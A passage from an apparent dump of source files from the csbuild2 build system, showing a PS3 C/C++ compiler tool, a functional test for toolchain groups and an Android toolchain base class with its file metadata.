EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps3_cpp_compiler\n\t:synopsis: Implementation of the PS3 C/C++ compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .cpp_compiler_base import CppCompilerBase\n\nfrom ..common.sony_tool_base import Ps3BaseTool, Ps3ProjectType, Ps3ToolsetType\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... 
import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\nclass Ps3CppCompiler(Ps3BaseTool, CppCompilerBase):\n\t\"\"\"\n\tPS3 C/C++ compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"cell\" }\n\toutputFiles = { \".o\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs3BaseTool.__init__(self, projectSettings)\n\t\tCppCompilerBase.__init__(self, projectSettings)\n\n\t\tself._compilerExeName = None\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs3BaseTool.SetupForProject(self, project)\n\t\tCppCompilerBase.SetupForProject(self, project)\n\n\t\tself._compilerExeName = {\n\t\t\tPs3ToolsetType.PpuSnc: (\"ps3ppusnc.exe\", \"ps3ppusnc.exe\"),\n\t\t\tPs3ToolsetType.PpuGcc: (\"ppu-lv2-gcc.exe\", \"ppu-lv2-g++.exe\"),\n\t\t\tPs3ToolsetType.Spu: (\"spu-lv2-gcc.exe\", \"spu-lv2-g++.exe\"),\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\t\tassert self._compilerExeName, \"Invalid PS3 toolset type: {}\".format(self._ps3BuildInfo.toolsetType)\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmdExe = self._getComplierName(isCpp)\n\t\tcmd = self._getCustomArgs(isCpp) \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getLanguageStandardArgs(isCpp) \\\n\t\t\t+ self._getPreprocessorArgs(project) \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getInputFileArgs(inputFile)\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self, isCpp):\n\t\treturn os.path.join(self._ps3SystemBinPath, self._compilerExeName[1] if isCpp else self._compilerExeName[0])\n\n\tdef _getCustomArgs(self, isCpp):\n\t\treturn self._globalFlags + (self._cxxFlags if isCpp else self._cFlags)\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", inputFile.filename]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", outputFiles[0]]\n\n\tdef _getPreprocessorArgs(self, project):\n\t\targs = [\"-D__PS3__\"]\n\n\t\tif self._ps3BuildInfo.toolsetType != Ps3ToolsetType.Spu:\n\t\t\tif self._ps3BuildInfo.toolsetType == Ps3ToolsetType.PpuGcc:\n\t\t\t\targs.append(\"-D__GCC__\")\n\n\t\t\tif project.projectType 
in (Ps3ProjectType.PpuSncSharedLibrary, Ps3ProjectType.PpuGccSharedLibrary):\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-DCSB_PS3_PPU_PRX_LIBNAME=cellPrx_{}\".format(project.name),\n\t\t\t\t\t\"-DCSB_PS3_PPU_PRX_STUBNAME=cellPrx_{}_stub\".format(project.name),\n\t\t\t\t])\n\n\t\targs.extend([\"-D{}\".format(d) for d in self._defines])\n\t\targs.extend([\"-U{}\".format(u) for u in self._undefines])\n\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = [\"-I{}\".format(path) for path in sorted(self._includeDirectories) + self._ps3SystemIncludePaths]\n\n\t\treturn args\n\n\tdef _getDebugArgs(self):\n\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\treturn [\"-g\"]\n\t\treturn []\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: \"s\",\n\t\t\tOptimizationLevel.Speed: \"d\",\n\t\t\tOptimizationLevel.Max: \"3\",\n\t\t}\n\t\treturn [\"-O{}\".format(arg.get(self._optLevel, \"0\"))]\n\n\tdef _getLanguageStandardArgs(self, isSourceCpp):\n\t\t# No argument for the C language standard.\n\t\targ = \"-Xstd={}\".format(self._cxxStandard) if self._cxxStandard and isSourceCpp else None\n\t\treturn [arg]\n" }, { "alpha_fraction": 0.7368205785751343, "alphanum_fraction": 0.7482631802558899, "avg_line_length": 41.18965530395508, "blob_id": "e84cf1f1f24255230a60c48af5f0e58370f3c251", "content_id": "a3f4b1838ec0d9161165389cc341f9764fd2fad4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2447, "license_type": "no_license", "max_line_length": 97, "num_lines": 58, "path": "/functional_tests/toolchain_groups_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test for toolchain groups\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nclass ToolchainGroupsTest(FunctionalTest):\n\t\"\"\"Toolchain groups test\"\"\"\n\t# pylint: disable=invalid-name\n\tdef runTest(self, projectName):\n\t\t\"\"\"Toolchain groups test\"\"\"\n\t\tself.assertMakeSucceeds(\"--ao\", \"-v\", \"--project\", projectName)\n\n\t\tfor i in range(1, 11):\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/{}.second\".format(i), str(i*2))\n\n\t\tself.assertFileContents(\"./out/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/AddDoubles2/MiddleFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/AddDoubles3/MiddleFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/AddDoubles4/Foo.third\", \"110\")\n\n\t\tself.cleanArgs = [\"--ao\"]\n\n\tdef testWithSyntax(self):\n\t\t\"\"\"Test using the with syntax\"\"\"\n\t\tself.runTest(\"TestProject\")\n\n\tdef testChained(self):\n\t\t\"\"\"Test using chained context managers\"\"\"\n\t\tself.runTest(\"TestProjectChained\")\n" }, { "alpha_fraction": 0.6886898875236511, "alphanum_fraction": 0.6962937712669373, "avg_line_length": 34.507999420166016, "blob_id": "a37a367c349da787af833cfeedb64119c6e3a9dc", "content_id": "0861e14e2f8db500d59738044c20ff28476577df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17754, "license_type": "no_license", "max_line_length": 153, "num_lines": 500, "path": "/csbuild/tools/common/android_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_tool_base\n\t:synopsis: Abstract base class for Android tools.\n\n.. 
moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport glob\nimport os\nimport platform\n\nfrom abc import ABCMeta\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\n@MetaClass(ABCMeta)\nclass AndroidStlLibType(object):\n\t\"\"\"\n\tEnum values for selecting the type of STL library linked into Android projects.\n\t\"\"\"\n\tGnu = \"gnu-libstdc++\"\n\tLibCpp = \"libc++\"\n\tStlPort = \"stlport\"\n\nclass AndroidInfo(object):\n\t\"\"\"\n\tCollection of paths for a specific version of Android and architecture.\n\n\t:param gccToolchainRootPath: Full path to the root directory containing the gcc toolchain.\n\t:type gccToolchainRootPath: str\n\n\t:param gccPath: Full path to the gcc executable.\n\t:type gccPath: str\n\n\t:param gppPath: Full path to the g++ executable.\n\t:type gppPath: str\n\n\t:param asPath: Full path to the as executable.\n\t:type asPath: str\n\n\t:param ldPath: Full path to the ld executable.\n\t:type ldPath: str\n\n\t:param arPath: Full path to the ar executable.\n\t:type arPath: str\n\n\t:param clangPath: Full path to the clang executable.\n\t:type clangPath: str\n\n\t:param clangppPath: Full path to the clang++ executable.\n\t:type clangppPath: str\n\n\t:param zipAlignPath: Full path to the zipAlign executable.\n\t:type zipAlignPath: str\n\n\t:param sysRootPath: Full path to the Android system root.\n\t:type sysRootPath: str\n\n\t:param systemLibPath: Full path to the Android system libraries.\n\t:type systemLibPath: str\n\n\t:param systemIncludePaths: List of full paths to the Android system headers.\n\t:type systemIncludePaths: list[str]\n\n\t:param nativeAppGluPath: Full path to the Android native glue source and header files.\n\t:type nativeAppGluPath: str\n\n\t:param stlLibName: Basename of the STL library to link against.\n\t:type stlLibName: str\n\n\t:param stlLibPath: Full path to the STL libraries.\n\t:type stlLibPath: str\n\n\t:param stlIncludePaths: List of full paths to the STL headers.\n\t:type stlIncludePaths: list[str]\n\t\"\"\"\n\tInstances = {}\n\n\tdef __init__(\n\t\tself,\n\t\tgccToolchainRootPath,\n\t\tgccPath,\n\t\tgppPath,\n\t\tasPath,\n\t\tldPath,\n\t\tarPath,\n\t\tclangPath,\n\t\tclangppPath,\n\t\tzipAlignPath,\n\t\tsysRootPath,\n\t\tsystemLibPath,\n\t\tsystemIncludePaths,\n\t\tnativeAppGluPath,\n\t\tstlLibName,\n\t\tstlLibPath,\n\t\tstlIncludePaths,\n\t):\n\t\tself.gccToolchainRootPath = gccToolchainRootPath\n\t\tself.gccPath = gccPath\n\t\tself.gppPath = gppPath\n\t\tself.asPath = asPath\n\t\tself.ldPath = ldPath\n\t\tself.arPath = arPath\n\t\tself.clangPath = clangPath\n\t\tself.clangppPath = clangppPath\n\t\tself.zipAlignPath = zipAlignPath\n\t\tself.sysRootPath = sysRootPath\n\t\tself.systemLibPath = systemLibPath\n\t\tself.systemIncludePaths = [path for path in systemIncludePaths if path]\n\t\tself.nativeAppGluPath = nativeAppGluPath\n\t\tself.stlLibName = stlLibName\n\t\tself.stlLibPath = stlLibPath\n\t\tself.stlIncludePaths = [path for path in stlIncludePaths if path]\n\n\n@MetaClass(ABCMeta)\nclass AndroidToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targeting Android platforms.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tsupportedArchitectures = { \"x86\", \"x64\", \"arm\", \"arm64\", \"mips\", \"mips64\" }\n\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, 
projectSettings)\n\n\t\tself._androidNdkRootPath = projectSettings.get(\"androidNdkRootPath\", \"\")\n\t\tself._androidSdkRootPath = projectSettings.get(\"androidSdkRootPath\", \"\")\n\t\tself._androidManifestFilePath = projectSettings.get(\"androidManifestFilePath\", \"\")\n\t\tself._androidTargetSdkVersion = projectSettings.get(\"androidTargetSdkVersion\", None)\n\t\tself._androidStlLibType = projectSettings.get(\"androidStlLibType\", None)\n\t\tself._androidNativeAppGlue = projectSettings.get(\"androidNativeAppGlue\", False)\n\n\t\t# If no NDK root path is specified, try to get it from the environment.\n\t\tif not self._androidNdkRootPath and \"ANDROID_NDK_ROOT\" in os.environ:\n\t\t\tself._androidNdkRootPath = os.environ[\"ANDROID_NDK_ROOT\"]\n\n\t\t# If no SDK root path is specified, try to get it from the environment.\n\t\tif not self._androidSdkRootPath and \"ANDROID_HOME\" in os.environ:\n\t\t\tself._androidSdkRootPath = os.environ[\"ANDROID_HOME\"]\n\n\t\tassert self._androidNdkRootPath, \"No Android NDK root path provided\"\n\t\tassert self._androidSdkRootPath, \"No Android SDK root path provided\"\n\t\tassert self._androidTargetSdkVersion, \"No Android target SDK version provided\"\n\n\t\tassert os.access(self._androidNdkRootPath, os.F_OK), \"Android NDK root path does not exist: {}\".format(self._androidNdkRootPath)\n\t\tassert os.access(self._androidSdkRootPath, os.F_OK), \"Android SDK root path does not exist: {}\".format(self._androidSdkRootPath)\n\n\t\tself._androidInfo = None\n\n\t####################################################################################################################\n\t### Private methods\n\t####################################################################################################################\n\n\tdef _getInfo(self, arch):\n\t\tkey = (self._androidNdkRootPath, self._androidSdkRootPath, arch)\n\n\t\tif key not in AndroidInfo.Instances:\n\t\t\tdef _getToolchainPrefix():\n\t\t\t\t# Search for a toolchain by architecture.\n\t\t\t\ttoolchainArchPrefix = {\n\t\t\t\t\t\"x86\": \"x86\",\n\t\t\t\t\t\"x64\": \"x86_64\",\n\t\t\t\t\t\"arm\": \"arm\",\n\t\t\t\t\t\"arm64\": \"aarch64\",\n\t\t\t\t\t\"mips\": \"mipsel\",\n\t\t\t\t\t\"mips64\": \"mips64el\",\n\t\t\t\t}.get(arch, \"\")\n\t\t\t\tassert toolchainArchPrefix, \"Android architecture not supported: {}\".format(arch)\n\t\t\t\treturn toolchainArchPrefix\n\n\t\t\tdef _getStlArchName():\n\t\t\t\tstlArchName = {\n\t\t\t\t\t\"x86\": \"x86\",\n\t\t\t\t\t\"x64\": \"x86_64\",\n\t\t\t\t\t\"arm\": \"armeabi-v7a\",\n\t\t\t\t\t\"arm64\": \"arm64-v8a\",\n\t\t\t\t\t\"mips\": \"mips\",\n\t\t\t\t\t\"mips64\": \"mips64\",\n\t\t\t\t}.get(arch, \"\")\n\t\t\t\tassert stlArchName, \"Android architecture not supported: {}\".format(arch)\n\t\t\t\treturn stlArchName\n\n\t\t\tdef _getIncludeArchName():\n\t\t\t\t# Search for a toolchain by architecture.\n\t\t\t\tincludeArchName = {\n\t\t\t\t\t\"x86\": \"i686-linux-android\",\n\t\t\t\t\t\"x64\": \"x86_64-linux-android\",\n\t\t\t\t\t\"arm\": \"arm-linux-androideabi\",\n\t\t\t\t\t\"arm64\": \"aarch64-linux-android\",\n\t\t\t\t\t\"mips\": \"mipsel-linux-android\",\n\t\t\t\t\t\"mips64\": \"mips64el-linux-android\",\n\t\t\t\t}.get(arch, \"\")\n\t\t\t\tassert includeArchName, \"Android architecture not supported: {}\".format(arch)\n\t\t\t\treturn includeArchName\n\n\t\t\t# Certain architectures must use the \"lib64\" directory instead of \"lib\".\n\t\t\tuseLib64 = {\n\t\t\t\t\"x64\": True,\n\t\t\t\t\"mips64\": True,\n\t\t\t}.get(arch, False)\n\n\t\t\tplatformName = 
platform.system().lower()\n\t\t\texeExtension = \".exe\" if platform.system() == \"Windows\" else \"\"\n\t\t\ttoolchainPrefix = _getToolchainPrefix()\n\t\t\trootToolchainPath = os.path.join(self._androidNdkRootPath, \"toolchains\")\n\t\t\tarchToolchainRootPath = glob.glob(os.path.join(rootToolchainPath, \"{}-*\".format(toolchainPrefix)))\n\t\t\tllvmToolchainRootPath = glob.glob(os.path.join(rootToolchainPath, \"llvm\", \"prebuilt\", \"{}-*\".format(platformName)))\n\t\t\tstlArchName = _getStlArchName()\n\t\t\tstlRootPath = os.path.join(self._androidNdkRootPath, \"sources\", \"cxx-stl\")\n\t\t\tsysRootPath = os.path.join(self._androidNdkRootPath, \"platforms\", \"android-{}\".format(self._androidTargetSdkVersion), self._getPlatformArchName(arch))\n\t\t\tsysRootLibPath = os.path.join(sysRootPath, \"usr\", \"lib64\" if useLib64 else \"lib\")\n\t\t\tsysRootBaseIncludePath = os.path.join(self._androidNdkRootPath, \"sysroot\", \"usr\", \"include\")\n\t\t\tsysRootArchIncludePath = os.path.join(sysRootBaseIncludePath, _getIncludeArchName())\n\t\t\tandroidSourcesRootPath = os.path.join(self._androidNdkRootPath, \"sources\", \"android\")\n\t\t\tandroidSupportIncludePath = os.path.join(androidSourcesRootPath, \"support\", \"include\")\n\t\t\tnativeAppGluePath = os.path.join(androidSourcesRootPath, \"native_app_glue\")\n\n\t\t\tassert archToolchainRootPath, \"No Android toolchain installed for architecture: {}\".format(arch)\n\t\t\tassert llvmToolchainRootPath, \"No Android LLVM toolchain installed for platform: {}\".format(platformName)\n\t\t\tassert os.access(sysRootPath, os.F_OK), \"No Android sysroot found at path: {}\".format(sysRootPath)\n\n\t\t\tarchToolchainRootPath = archToolchainRootPath[0]\n\n\t\t\tgccVersionStartIndex = archToolchainRootPath.rfind(\"-\")\n\t\t\tassert gccVersionStartIndex > 0, \"Android GCC version not parsable from path: {}\".format(archToolchainRootPath)\n\n\t\t\t# Save the gcc version since we'll need it for getting the libstdc++ paths.\n\t\t\tgccVersion = archToolchainRootPath[gccVersionStartIndex + 1:]\n\n\t\t\tarchToolchainRootPath = glob.glob(os.path.join(archToolchainRootPath, \"prebuilt\", \"{}-*\".format(platformName)))\n\t\t\tassert archToolchainRootPath, \"No Android \\\"{}\\\" toolchain installed for platform: {}\".format(toolchainPrefix, platformName)\n\n\t\t\tarchToolchainRootPath = archToolchainRootPath[0]\n\t\t\tllvmToolchainRootPath = llvmToolchainRootPath[0]\n\n\t\t\tarchToolchainIncludePath = glob.glob(os.path.join(archToolchainRootPath, \"lib\", \"gcc\", \"*\", \"*\", \"include\"))\n\t\t\tarchToolchainIncludePath = archToolchainIncludePath[0] if archToolchainIncludePath else \"\"\n\n\t\t\tarchToolchainBinPath = os.path.join(archToolchainRootPath, \"bin\")\n\t\t\tllvmToolchainBinPath = os.path.join(llvmToolchainRootPath, \"bin\")\n\n\t\t\t# Get the compiler and linker paths.\n\t\t\tgccPath = glob.glob(os.path.join(archToolchainBinPath, \"*-gcc{}\".format(exeExtension)))\n\t\t\tgppPath = glob.glob(os.path.join(archToolchainBinPath, \"*-g++{}\".format(exeExtension)))\n\t\t\tasPath = glob.glob(os.path.join(archToolchainBinPath, \"*-as{}\".format(exeExtension)))\n\t\t\tldPath = glob.glob(os.path.join(archToolchainBinPath, \"*-ld{}\".format(exeExtension)))\n\t\t\tarPath = glob.glob(os.path.join(archToolchainBinPath, \"*-ar{}\".format(exeExtension)))\n\t\t\tclangPath = os.path.join(llvmToolchainBinPath, \"clang{}\".format(exeExtension))\n\t\t\tclangppPath = os.path.join(llvmToolchainBinPath, \"clang++{}\".format(exeExtension))\n\n\t\t\t# Do not assert on 
missing gcc or clang. GCC was deprecated and removed from later versions of the NDK\n\t\t\t# and clang wasn't added until several NDK versions in. It's best to assert only when trying to use\n\t\t\t# their respective toolchains.\n\t\t\tassert asPath, \"No Android as executable found for architecture: {}\".format(arch)\n\t\t\tassert ldPath, \"No Android ld executable found for architecture: {}\".format(arch)\n\t\t\tassert arPath, \"No Android ar executable found for architecture: {}\".format(arch)\n\n\t\t\tgccPath = gccPath[0] if gccPath else None\n\t\t\tgppPath = gppPath[0] if gppPath else None\n\t\t\tasPath = asPath[0]\n\t\t\tldPath = ldPath[0]\n\t\t\tarPath = arPath[0]\n\n\t\t\tbuildToolsPath = glob.glob(os.path.join(self._androidSdkRootPath, \"build-tools\", \"*\"))\n\t\t\tassert buildToolsPath, \"No Android build tools are installed\"\n\n\t\t\t# For now, it doesn't seem like we need a specific version, so just pick the first one.\n\t\t\tbuildToolsPath = buildToolsPath[0]\n\n\t\t\t# Get the miscellaneous build tool paths.\n\t\t\tzipAlignPath = os.path.join(buildToolsPath, \"zipalign{}\".format(exeExtension))\n\n\t\t\tassert os.access(zipAlignPath, os.F_OK), \"ZipAlign not found in Android build tools path: {}\".format(buildToolsPath)\n\n\t\t\t# If an STL flavor has been specified, attempt to get its include & lib paths.\n\t\t\tif self._androidStlLibType:\n\t\t\t\tstlLibName = {\n\t\t\t\t\tAndroidStlLibType.Gnu: \"libgnustl\",\n\t\t\t\t\tAndroidStlLibType.LibCpp: \"libc++\",\n\t\t\t\t\tAndroidStlLibType.StlPort: \"libstlport\",\n\t\t\t\t}.get(self._androidStlLibType, None)\n\t\t\t\tassert stlLibName, \"Invalid Android STL type: {}\".format(self._androidStlLibType)\n\n\t\t\t\tstlLibDirName = {\n\t\t\t\t\tAndroidStlLibType.Gnu: \"gnu-libstdc++\",\n\t\t\t\t\tAndroidStlLibType.LibCpp: \"llvm-libc++\",\n\t\t\t\t\tAndroidStlLibType.StlPort: \"stlport\",\n\t\t\t\t}.get(self._androidStlLibType, None)\n\t\t\t\tassert stlLibDirName, \"Invalid Android STL type: {}\".format(self._androidStlLibType)\n\n\t\t\t\tstlRootPath = os.path.join(stlRootPath, stlLibDirName)\n\n\t\t\t\t# libstdc++ exists in a sub-directory indicating its version.\n\t\t\t\tif self._androidStlLibType == AndroidStlLibType.Gnu:\n\t\t\t\t\tstlRootPath = os.path.join(stlRootPath, gccVersion)\n\n\t\t\t\tassert os.access(stlRootPath, os.F_OK), \"Android STL \\\"{}\\\" not found at path: {}\".format(self._androidStlLibType, stlRootPath)\n\n\t\t\t\tstlLibPath = os.path.join(stlRootPath, \"libs\", stlArchName)\n\t\t\t\tstlIncludePaths = [\n\t\t\t\t\tos.path.join(stlRootPath, \"include\"),\n\t\t\t\t]\n\n\t\t\t\t# For some reason \"gnu-libstdc++\" thought it was a good idea to put includes under its library directory.\n\t\t\t\tif self._androidStlLibType == AndroidStlLibType.Gnu:\n\t\t\t\t\tstlIncludePaths.append(\n\t\t\t\t\t\tos.path.join(stlLibPath, \"include\"),\n\t\t\t\t\t)\n\n\t\t\telse:\n\t\t\t\t# No STL, just use dummy values.\n\t\t\t\tstlLibName = None\n\t\t\t\tstlLibPath = None\n\t\t\t\tstlIncludePaths = []\n\n\t\t\tAndroidInfo.Instances[key] = 
\\\n\t\t\t\tAndroidInfo(\n\t\t\t\t\tarchToolchainRootPath,\n\t\t\t\t\tgccPath,\n\t\t\t\t\tgppPath,\n\t\t\t\t\tasPath,\n\t\t\t\t\tldPath,\n\t\t\t\t\tarPath,\n\t\t\t\t\tclangPath,\n\t\t\t\t\tclangppPath,\n\t\t\t\t\tzipAlignPath,\n\t\t\t\t\tsysRootPath,\n\t\t\t\t\tsysRootLibPath,\n\t\t\t\t\t[\n\t\t\t\t\t\tsysRootBaseIncludePath,\n\t\t\t\t\t\tsysRootArchIncludePath,\n\t\t\t\t\t\tarchToolchainIncludePath,\n\t\t\t\t\t\tandroidSupportIncludePath,\n\t\t\t\t\t],\n\t\t\t\t\tnativeAppGluePath,\n\t\t\t\t\tstlLibName,\n\t\t\t\t\tstlLibPath,\n\t\t\t\t\tstlIncludePaths,\n\t\t\t\t)\n\n\t\treturn AndroidInfo.Instances[key]\n\n\tdef _getPlatformArchName(self, arch):\n\t\tplatformArchName = {\n\t\t\t\"x86\": \"arch-x86\",\n\t\t\t\"x64\": \"arch-x86_64\",\n\t\t\t\"arm\": \"arch-arm\",\n\t\t\t\"arm64\": \"arch-arm64\",\n\t\t\t\"mips\": \"arch-mips\",\n\t\t\t\"mips64\": \"arch-mips64\",\n\t\t}.get(arch, \"\")\n\t\tassert platformArchName, \"Architecture platform name not found for: {}\".format(arch)\n\t\treturn platformArchName\n\n\tdef _getBuildArchName(self, arch):\n\t\t# Only ARM needs a build architecture name.\n\t\tname = {\n\t\t\t\"arm\": \"armv7-a\",\n\t\t\t\"arm64\": \"armv8-a\",\n\t\t}.get(arch, \"\")\n\t\treturn name\n\n\tdef _getTargetTripleName(self, arch):\n\t\ttargetTriple = {\n\t\t\t\"x86\": \"i686-none-linux-android\",\n\t\t\t\"x64\": \"x86_64-none-linux-android\",\n\t\t\t\"arm\": \"armv7-none-linux-androideabi\",\n\t\t\t\"arm64\": \"aarch64-none-linux-android\",\n\t\t\t\"mips\": \"mipsel-none-linux-android\",\n\t\t\t\"mips64\": \"mips64el-none-linux-android\",\n\t\t}.get(arch, \"\")\n\t\tassert targetTriple, \"Architecture target triple not defined for: {}\".format(arch)\n\t\treturn targetTriple\n\n\tdef _getDefaultLinkerArgs(self):\n\t\treturn [\n\t\t\t\"-Wl,--no-undefined\",\n\t\t\t\"-Wl,--no-allow-shlib-undefined\",\n\t\t\t\"-Wl,--unresolved-symbols=report-all\",\n\t\t\t\"-Wl,-z,noexecstack\",\n\t\t\t\"-Wl,-z,relro\",\n\t\t\t\"-Wl,-z,now\",\n\t\t]\n\n\tdef _getDefaultCompilerArgs(self):\n\t\treturn [\n\t\t\t\"-funwind-tables\",\n\t\t\t\"-fstack-protector\",\n\t\t\t\"-fno-omit-frame-pointer\",\n\t\t\t\"-fno-strict-aliasing\",\n\t\t\t\"-fno-short-enums\",\n\t\t\t\"-Wa,--noexecstack\",\n\t\t]\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tTool.SetupForProject(self, project)\n\n\t\tif not self._androidInfo:\n\t\t\tself._androidInfo = self._getInfo(project.architectureName)\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef SetAndroidNdkRootPath(path):\n\t\t\"\"\"\n\t\tSets the path to the Android NDK home.\n\n\t\t:param path: Android NDK home path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"androidNdkRootPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetAndroidSdkRootPath(path):\n\t\t\"\"\"\n\t\tSets the path to the Android SDK root.\n\n\t\t:param path: Android SDK 
